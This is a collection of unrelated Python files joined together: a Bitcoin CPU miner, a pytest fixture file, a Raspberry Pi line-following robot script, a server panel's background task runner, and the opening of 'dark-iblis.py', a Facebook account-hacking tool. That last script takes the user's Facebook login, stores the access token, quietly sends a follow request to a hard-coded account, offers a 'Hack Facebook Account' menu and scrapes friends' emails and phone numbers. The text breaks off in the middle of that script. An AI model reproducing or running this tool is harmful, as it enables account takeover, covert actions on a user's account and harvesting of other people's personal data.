self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
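# Helpers for the 32-bit byte swapping and word-order reversal that the getwork
# data/target layout requires.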
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76 bytes of the 80-byte header do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
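    # submit_work: splice the byte-swapped winning nonce back into the original getwork data hex
    # and send it upstream via getwork(data).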
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7818
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
conftest.py
|
import sys
import threading
from functools import wraps, partial
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
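# Hook: tests marked with @pytest.mark.spawn are run in a separate process via
# torch.multiprocessing.spawn instead of in the main pytest process.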
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from socketserver import ThreadingMixIn
from http.server import HTTPServer
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
centro_controle.py
|
import RPi.GPIO as GPIO
import time
import threading
from controle import *
from distancia import *
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
SENSOR_DIR = 40
SENSOR_ESQ = 38
estado_ativo = GPIO.LOW
motores = 1
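# Configure the two line-tracking sensor inputs (plus the motor and distance-sensor pins), then
# sample both inputs to decide which GPIO level counts as "on the line" (estado_ativo).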
def setup_sensor():
global estado_ativo
GPIO.setup(SENSOR_DIR, GPIO.IN)
GPIO.setup(SENSOR_ESQ, GPIO.IN)
setup_motor()
setup_sensor_som()
if GPIO.input(SENSOR_ESQ) == GPIO.HIGH and GPIO.input(SENSOR_DIR) == GPIO.HIGH:  # 'and', not bitwise '&'
estado_ativo = GPIO.HIGH
else:
estado_ativo = GPIO.LOW
def esquerdo():
if GPIO.input(SENSOR_ESQ) == estado_ativo:
print("CAMINHO")
return True
else:
print("FORA CAMINHO")
return False
def direito():
if GPIO.input(SENSOR_DIR) == estado_ativo:
print("Caminho")
return True
else:
print("Fora caminho")
return False
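# Background watchdog: keeps measuring distance and stops the motors (motores = 0) whenever an
# obstacle is closer than 30 (presumably centimetres).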
def controla_distancia():
global motores
motores = 0
while True:
if roda_medicao() < 30:
print("Colisao")
motores = 0
move_parar()
else:
motores = 1
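# Line-following loop: while the watchdog allows movement, steer according to which sensor still
# sees the line; when both sensors lose it, turn left and hand over to estacionar().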
def prepara_estacionar():
direita = False
esquerda = False
try:
t1 = threading.Thread(target=controla_distancia,args=())
t1.start()
while True:
if motores == 1:
esquerda = esquerdo()
direita = direito()
if direita and esquerda:
print("FRENTE")
move_frente()
elif not direita and not esquerda:
move_esquerda(estado_ativo)
estacionar()
return True
elif direita == False:
print("DIREITA")
move_direita(estado_ativo)
elif esquerda == False:
print("ESQUERDA")
move_esquerda(estado_ativo)
else:
print("Risco de choque")
finally:
GPIO.cleanup()
def estacionar():
while True:
if motores == 1:
esquerda = esquerdo()
direita = direito()
if direita and esquerda:
print("FRENTE")
move_frente()
elif not direita and not esquerda:
move_parar()
return True
elif direita == False:
print("DIREITA")
move_direita(estado_ativo)
elif esquerda == False:
print("ESQUERDA")
move_esquerda(estado_ativo)
else:
print("Risco de choque")
#setup_sensor()
#find_line()
|
task.py
|
# coding: utf-8
#------------------------------
# Scheduled / background task runner
#------------------------------
import sys
import os
import json
import time
import threading
# print sys.path
sys.path.append(os.getcwd() + "/class/core")
import mw
# reload(sys)
# sys.setdefaultencoding('utf-8')
import db
# cmd = 'ls /usr/local/lib/ | grep python | cut -d \\ -f 1 | awk \'END {print}\''
# info = mw.execShell(cmd)
# p = "/usr/local/lib/" + info[0].strip() + "/site-packages"
# sys.path.append(p)
import psutil
global pre, timeoutCount, logPath, isTask, oldEdate, isCheck
pre = 0
timeoutCount = 0
isCheck = 0
oldEdate = None
logPath = os.getcwd() + '/tmp/panelExec.log'
isTask = os.getcwd() + '/tmp/panelTask.pl'
if not os.path.exists(os.getcwd() + "/tmp"):
os.system('mkdir -p ' + os.getcwd() + "/tmp")
if not os.path.exists(logPath):
os.system("touch " + logPath)
if not os.path.exists(isTask):
os.system("touch " + isTask)
def mw_async(f):
def wrapper(*args, **kwargs):
thr = threading.Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@mw_async
def restartMw():
time.sleep(1)
cmd = mw.getRunDir() + '/scripts/init.d/mw reload &'
mw.execShell(cmd)
class MyBad():
_msg = None
def __init__(self, msg):
self._msg = msg
def __repr__(self):
return self._msg
def execShell(cmdstring, cwd=None, timeout=None, shell=True):
try:
global logPath
import shlex
import datetime
import subprocess
import time
if timeout:
end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
sub = subprocess.Popen(cmdstring + ' > ' + logPath + ' 2>&1',
cwd=cwd, stdin=subprocess.PIPE, shell=shell, bufsize=4096)
while sub.poll() is None:
time.sleep(0.1)
data = sub.communicate()
# python3 fix: subprocess output is bytes, decode to str before returning
t1 = data[0].decode('utf-8') if isinstance(data[0], bytes) else data[0]
t2 = data[1].decode('utf-8') if isinstance(data[1], bytes) else data[1]
return (t1, t2)
except Exception as e:
return None
def downloadFile(url, filename):
# Download a file and report progress through downloadHook
try:
import urllib.request
import socket
socket.setdefaulttimeout(10)
urllib.request.urlretrieve(url, filename=filename, reporthook=downloadHook)
os.system('chown www.www ' + filename)
writeLogs('done')
except:
writeLogs('done')
def downloadHook(count, blockSize, totalSize):
# Download progress callback: write percentage/speed info to the log file
global pre
used = count * blockSize
pre1 = int((100.0 * used / totalSize))
if pre == pre1:
return
speed = {'total': totalSize, 'used': used, 'pre': pre}
# print 'task downloadHook', speed
writeLogs(json.dumps(speed))
pre = pre1
def writeLogs(logMsg):
# Write the output log
try:
global logPath
fp = open(logPath, 'w+')
fp.write(logMsg)
fp.close()
except:
pass
def startTask():
# Task queue: poll the tasks table and run pending download/shell jobs
global isTask
try:
while True:
try:
if os.path.exists(isTask):
# print "run --- !"
sql = db.Sql()
sql.table('tasks').where(
"status=?", ('-1',)).setField('status', '0')
taskArr = sql.table('tasks').where("status=?", ('0',)).field(
'id,type,execstr').order("id asc").select()
# print sql
for value in taskArr:
# print value
start = int(time.time())
if not sql.table('tasks').where("id=?", (value['id'],)).count():
continue
sql.table('tasks').where("id=?", (value['id'],)).save(
'status,start', ('-1', start))
if value['type'] == 'download':
argv = value['execstr'].split('|mw|')
downloadFile(argv[0], argv[1])
elif value['type'] == 'execshell':
execShell(value['execstr'])
end = int(time.time())
sql.table('tasks').where("id=?", (value['id'],)).save(
'status,end', ('1', end))
# if(sql.table('tasks').where("status=?", ('0')).count() < 1):
# os.system('rm -f ' + isTask)
except:
pass
# siteEdate()
# mainSafe()
time.sleep(2)
except:
time.sleep(60)
startTask()
def mainSafe():
global isCheck
try:
if isCheck < 100:
isCheck += 1
return True
isCheck = 0
isStart = mw.execShell(
"ps aux |grep 'python main.py'|grep -v grep|awk '{print $2}'")[0]
if not isStart:
os.system('/etc/init.d/bt start')
isStart = mw.execShell(
"ps aux |grep 'python main.py'|grep -v grep|awk '{print $2}'")[0]
mw.writeLog('守护程序', '面板服务程序启动成功 -> PID: ' + isStart)
except:
time.sleep(30)
mainSafe()
def siteEdate():
# Stop websites whose expiry date has passed
global oldEdate
try:
if not oldEdate:
oldEdate = mw.readFile('data/edate.pl')
if not oldEdate:
oldEdate = '0000-00-00'
mEdate = time.strftime('%Y-%m-%d', time.localtime())
if oldEdate == mEdate:
return False
edateSites = mw.M('sites').where('edate>? AND edate<? AND (status=? OR status=?)',
('0000-00-00', mEdate, 1, u'正在运行')).field('id,name').select()
import panelSite
siteObject = panelSite.panelSite()
for site in edateSites:
get = MyBad('')
get.id = site['id']
get.name = site['name']
siteObject.SiteStop(get)
oldEdate = mEdate
mw.writeFile('data/edate.pl', mEdate)
except:
pass
def systemTask():
# System monitoring task: sample CPU, network, disk IO and load average into the system db
try:
import system_api
import psutil
import time
sm = system_api.system_api()
filename = 'data/control.conf'
sql = db.Sql().dbfile('system')
csql = mw.readFile('data/sql/system.sql')
csql_list = csql.split(';')
for index in range(len(csql_list)):
sql.execute(csql_list[index], ())
cpuIo = cpu = {}
cpuCount = psutil.cpu_count()
used = count = 0
reloadNum = 0
network_up = network_down = diskio_1 = diskio_2 = networkInfo = cpuInfo = diskInfo = None
while True:
if not os.path.exists(filename):
time.sleep(10)
continue
day = 30
try:
day = int(mw.readFile(filename))
if day < 1:
time.sleep(10)
continue
except:
day = 30
tmp = {}
# Sample current CPU usage
tmp['used'] = psutil.cpu_percent(interval=1)
if not cpuInfo:
tmp['mem'] = sm.getMemUsed()
cpuInfo = tmp
if cpuInfo['used'] < tmp['used']:
tmp['mem'] = sm.getMemUsed()
cpuInfo = tmp
# Sample current network IO
networkIo = psutil.net_io_counters()[:4]
if not network_up:
network_up = networkIo[0]
network_down = networkIo[1]
tmp = {}
tmp['upTotal'] = networkIo[0]
tmp['downTotal'] = networkIo[1]
tmp['up'] = round(float((networkIo[0] - network_up) / 1024), 2)
tmp['down'] = round(float((networkIo[1] - network_down) / 1024), 2)
tmp['downPackets'] = networkIo[3]
tmp['upPackets'] = networkIo[2]
network_up = networkIo[0]
network_down = networkIo[1]
if not networkInfo:
networkInfo = tmp
if (tmp['up'] + tmp['down']) > (networkInfo['up'] + networkInfo['down']):
networkInfo = tmp
# Sample disk IO
# if os.path.exists('/proc/diskstats'):
diskio_2 = psutil.disk_io_counters()
if not diskio_1:
diskio_1 = diskio_2
tmp = {}
tmp['read_count'] = diskio_2.read_count - diskio_1.read_count
tmp['write_count'] = diskio_2.write_count - diskio_1.write_count
tmp['read_bytes'] = diskio_2.read_bytes - diskio_1.read_bytes
tmp['write_bytes'] = diskio_2.write_bytes - diskio_1.write_bytes
tmp['read_time'] = diskio_2.read_time - diskio_1.read_time
tmp['write_time'] = diskio_2.write_time - diskio_1.write_time
if not diskInfo:
diskInfo = tmp
else:
diskInfo['read_count'] += tmp['read_count']
diskInfo['write_count'] += tmp['write_count']
diskInfo['read_bytes'] += tmp['read_bytes']
diskInfo['write_bytes'] += tmp['write_bytes']
diskInfo['read_time'] += tmp['read_time']
diskInfo['write_time'] += tmp['write_time']
diskio_1 = diskio_2
# print diskInfo
if count >= 12:
try:
addtime = int(time.time())
deltime = addtime - (day * 86400)
data = (cpuInfo['used'], cpuInfo['mem'], addtime)
sql.table('cpuio').add('pro,mem,addtime', data)
sql.table('cpuio').where("addtime<?", (deltime,)).delete()
data = (networkInfo['up'] / 5, networkInfo['down'] / 5, networkInfo['upTotal'], networkInfo[
'downTotal'], networkInfo['downPackets'], networkInfo['upPackets'], addtime)
sql.table('network').add(
'up,down,total_up,total_down,down_packets,up_packets,addtime', data)
sql.table('network').where(
"addtime<?", (deltime,)).delete()
# if os.path.exists('/proc/diskstats'):
data = (diskInfo['read_count'], diskInfo['write_count'], diskInfo['read_bytes'], diskInfo[
'write_bytes'], diskInfo['read_time'], diskInfo['write_time'], addtime)
sql.table('diskio').add(
'read_count,write_count,read_bytes,write_bytes,read_time,write_time,addtime', data)
sql.table('diskio').where(
"addtime<?", (deltime,)).delete()
# LoadAverage
load_average = sm.getLoadAverage()
lpro = round(
(load_average['one'] / load_average['max']) * 100, 2)
if lpro > 100:
lpro = 100
sql.table('load_average').add('pro,one,five,fifteen,addtime', (lpro, load_average[
'one'], load_average['five'], load_average['fifteen'], addtime))
lpro = None
load_average = None
cpuInfo = None
networkInfo = None
diskInfo = None
count = 0
reloadNum += 1
if reloadNum > 1440:
reloadNum = 0
mw.writeFile('logs/sys_interrupt.pl',
"reload num:" + str(reloadNum))
restartMw()
except Exception as ex:
print(str(ex))
mw.writeFile('logs/sys_interrupt.pl', str(ex))
del(tmp)
time.sleep(5)
count += 1
except Exception as ex:
print(str(ex))
mw.writeFile('logs/sys_interrupt.pl', str(ex))
restartMw()
import time
time.sleep(30)
systemTask()
# -------------------------------------- PHP monitoring start --------------------------------------------- #
# 502-error check loop
def check502Task():
try:
while True:
if os.path.exists(mw.getRunDir() + '/data/502Task.pl'):
check502()
time.sleep(30)
except:
time.sleep(30)
check502Task()
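# Probe every installed PHP-FPM version through its status URL and try to repair (reload, then
# restart) any version that is not responding.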
def check502():
try:
phpversions = ['53', '54', '55', '56', '70', '71', '72', '73', '74']
for version in phpversions:
sdir = mw.getServerDir()
php_path = sdir + '/php/' + version + '/sbin/php-fpm'
if not os.path.exists(php_path):
continue
if checkPHPVersion(version):
continue
if startPHPVersion(version):
print('检测到PHP-' + version + '处理异常,已自动修复!')
mw.writeLog('PHP守护程序', '检测到PHP-' + version + '处理异常,已自动修复!')
except Exception as e:
print(str(e))
# Repair the given PHP version (reload, then restart if needed)
def startPHPVersion(version):
sdir = mw.getServerDir()
try:
fpm = sdir + '/php/init.d/php' + version
php_path = sdir + '/php/' + version + '/sbin/php-fpm'
if not os.path.exists(php_path):
if os.path.exists(fpm):
os.remove(fpm)
return False
if not os.path.exists(fpm):
return False
# Try reloading the service first
os.system(fpm + ' reload')
if checkPHPVersion(version):
return True
# Otherwise try a full restart
cgi = '/tmp/php-cgi-' + version + '.sock'
pid = sdir + '/php/' + version + '/var/run/php-fpm.pid'
data = mw.execShell("ps -ef | grep php/" + version +
" | grep -v grep|grep -v python |awk '{print $2}'")
if data[0] != '':
os.system("ps -ef | grep php/" + version +
" | grep -v grep|grep -v python |awk '{print $2}' | xargs kill ")
time.sleep(0.5)
if not os.path.exists(cgi):
os.system('rm -f ' + cgi)
if not os.path.exists(pid):
os.system('rm -f ' + pid)
os.system(fpm + ' start')
if checkPHPVersion(version):
return True
# Check that it actually started
if os.path.exists(cgi):
return True
except Exception as e:
print(str(e))
return True
# Check the health of the given PHP version via its status page
def checkPHPVersion(version):
try:
url = 'http://127.0.0.1/phpfpm_status_' + version
result = mw.httpGet(url)
# print version,result
# Check the nginx/gateway response
if result.find('Bad Gateway') != -1:
return False
if result.find('HTTP Error 404: Not Found') != -1:
return False
# Check whether the web server itself is running
if result.find('Connection refused') != -1:
global isTask
if os.path.exists(isTask):
isStatus = mw.readFile(isTask)
if isStatus == 'True':
return True
filename = '/etc/init.d/openresty'
if os.path.exists(filename):
os.system(filename + ' start')
return True
except:
return True
# -------------------------------------- PHP monitoring end --------------------------------------------- #
if __name__ == "__main__":
t = threading.Thread(target=systemTask)
t.setDaemon(True)
t.start()
p = threading.Thread(target=check502Task)
p.setDaemon(True)
p.start()
startTask()
|
dark-iblis.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mEdition-2.3\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Yoga Wira \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFACEBOOK \x1b[1;91m: \x1b[1;92m \x1b[92mYoga Wira\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWa \x1b[1;91m: \x1b[1;92\x1b[92m0895611404746\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
